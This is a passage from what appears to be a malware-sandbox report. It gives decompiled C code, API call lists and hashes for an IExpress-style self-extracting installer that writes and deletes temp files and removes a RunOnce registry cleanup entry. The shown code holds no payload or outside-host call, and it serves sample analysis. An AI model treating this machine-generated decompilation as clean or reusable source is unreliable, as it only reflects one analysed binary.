                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00A96FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xa910b4);
                                                                                                                                                                                                        							_push(0xa910ac);
                                                                                                                                                                                                        							L00A97202();
                                                                                                                                                                                                        							 *0xa988b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xa988ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xa988b4;
                                                                                                                                                                                                        						if( *0xa988b4 != 0 && E00A97060(_t71, 0xa988b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xa988b4; // 0x0
                                                                                                                                                                                                        							 *0xa9a288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00A92BFB(0xa90000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xa981e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xa981f8;
                                                                                                                                                                                                        							if( *0xa981f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xa981e4;
                                                                                                                                                                                                        							if( *0xa981e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xa981e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00A9724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00a96b24
                                                                                                                                                                                                        0x00a96b24
                                                                                                                                                                                                        0x00a96b30
                                                                                                                                                                                                        0x00a96b39
                                                                                                                                                                                                        0x00a96b39
                                                                                                                                                                                                        0x00a96b3b
                                                                                                                                                                                                        0x00a96b42
                                                                                                                                                                                                        0x00a96b57
                                                                                                                                                                                                        0x00a96b5f
                                                                                                                                                                                                        0x00a96b65
                                                                                                                                                                                                        0x00a96b65
                                                                                                                                                                                                        0x00a96b67
                                                                                                                                                                                                        0x00a96b6c
                                                                                                                                                                                                        0x00a96b6e
                                                                                                                                                                                                        0x00a96b71
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96b7d
                                                                                                                                                                                                        0x00a96b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96b83
                                                                                                                                                                                                        0x00a96b8c
                                                                                                                                                                                                        0x00a96b8d
                                                                                                                                                                                                        0x00a96b90
                                                                                                                                                                                                        0x00a96b90
                                                                                                                                                                                                        0x00a96b83
                                                                                                                                                                                                        0x00a96b81
                                                                                                                                                                                                        0x00a96b94
                                                                                                                                                                                                        0x00a96b98
                                                                                                                                                                                                        0x00a96ba2
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96ba3
                                                                                                                                                                                                        0x00a96bab
                                                                                                                                                                                                        0x00a96bb0
                                                                                                                                                                                                        0x00a96bb5
                                                                                                                                                                                                        0x00a96bbc
                                                                                                                                                                                                        0x00a96bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96bbf
                                                                                                                                                                                                        0x00a96c1e
                                                                                                                                                                                                        0x00a96c25
                                                                                                                                                                                                        0x00a96c27
                                                                                                                                                                                                        0x00a96c2d
                                                                                                                                                                                                        0x00a96c2d
                                                                                                                                                                                                        0x00a96c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96bc5
                                                                                                                                                                                                        0x00a96bc5
                                                                                                                                                                                                        0x00a96bc8
                                                                                                                                                                                                        0x00a96bcc
                                                                                                                                                                                                        0x00a96bce
                                                                                                                                                                                                        0x00a96bce
                                                                                                                                                                                                        0x00a96bd1
                                                                                                                                                                                                        0x00a96bd3
                                                                                                                                                                                                        0x00a96bd3
                                                                                                                                                                                                        0x00a96bd6
                                                                                                                                                                                                        0x00a96bda
                                                                                                                                                                                                        0x00a96be1
                                                                                                                                                                                                        0x00a96be3
                                                                                                                                                                                                        0x00a96be5
                                                                                                                                                                                                        0x00a96be5
                                                                                                                                                                                                        0x00a96be6
                                                                                                                                                                                                        0x00a96be6
                                                                                                                                                                                                        0x00a96be9
                                                                                                                                                                                                        0x00a96bea
                                                                                                                                                                                                        0x00a96bea
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96c39
                                                                                                                                                                                                        0x00a96c3e
                                                                                                                                                                                                        0x00a96c3e
                                                                                                                                                                                                        0x00a96abe
                                                                                                                                                                                                        0x00a96abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                          • Part of subcall function 00A97155: QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00A972B8,00000058), ref: 00A96A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00A96AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00A96AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00A96B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A96B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00A96BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00A96BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                        • Instruction ID: 8468f1fb4b00f8bc32ff58e64bbdb3b1cc3b45e0c69e0036a57ca973261bc289
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2341E031B942259BDF21DBA8D9157AA77F4FF457A0F24411BE841E7290EF7848428BA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 a958c8-a958d5 632 a958d8-a958dd 631->632 632->632 633 a958df-a958f1 LocalAlloc 632->633 634 a95919-a95959 call a91680 call a9658a CreateFileA LocalFree 633->634 635 a958f3-a95901 call a944b9 633->635 639 a95906-a95910 call a96285 634->639 645 a9595b-a9596c CloseHandle GetFileAttributesA 634->645 635->639 644 a95912-a95918 639->644 645->639 646 a9596e-a95970 645->646 646->639 647 a95972-a9597b 646->647 647->644
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A958C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00A91680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00A9658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xa99124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A958E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-2139698323
                                                                                                                                                                                                        • Opcode ID: d6a8b7487451971e48956d65ef09825dc01c05595765df92e432c0eddd8ad861
                                                                                                                                                                                                        • Instruction ID: b6db20f54a5770bb6dd566dbcb19bb52f17e30fe2b23cae3fe78ea5cf56fef1d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6a8b7487451971e48956d65ef09825dc01c05595765df92e432c0eddd8ad861
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11E671B0021077DB249FB96C4EA9B7ED9EF46360B104617B505D7191DE70980687A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A951E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00A9468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00A9468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00A944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xa99124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xa99124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xa99124 = E00A96285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00a9524a
                                                                                                                                                                                                        0x00a95250
                                                                                                                                                                                                        0x00a95256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95256
                                                                                                                                                                                                        0x00a95219
                                                                                                                                                                                                        0x00a95223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95250
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 24280a97fac5998bfa6bb2d783bdee5a779bd89293e5af578f831db76d5d7c3c
                                                                                                                                                                                                        • Instruction ID: d13b387dfa6694a32ffb6a6644f15a638ebaaab004fe25faf94247dee9a53c51
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24280a97fac5998bfa6bb2d783bdee5a779bd89293e5af578f831db76d5d7c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF11E6B1B006017BDF55ABB55D4AF7B61EDEBDD340B10442FB602D5190DE788C024264
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00A952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xa991e0; // 0x31c8320
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xa98a24 == 0 &&  *0xa99a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00A91781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        					if(( *0xa99a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00A965E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00A92390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xa98a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xa99a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00A91FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xa98a20 =  *0xa98a20 & 0x00000000;
                                                                                                                                                                                                        				return E00A96CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(031C8320,00000080,?,00000000), ref: 00A952F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(031C8320), ref: 00A952FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(031C8320,?,00000000), ref: 00A95305
                                                                                                                                                                                                        • LocalFree.KERNEL32(031C8320), ref: 00A9530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00A911FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A95363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A95334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-2312194364
                                                                                                                                                                                                        • Opcode ID: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                        • Instruction ID: a312f06bb88c8a8486a8d93cdd3a52ee05c340da98bff0678e48864552fdbb6a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721AE31B00614EBDF22DBB4ED1AB6A77E4FB14790F04025BE8469A5A0CFB45C86CB84
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A91FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xa98530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A9538C,?,?,00A9538C), ref: 00A92005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00A9538C,wextract_cleanup0,?,?,00A9538C), ref: 00A92017
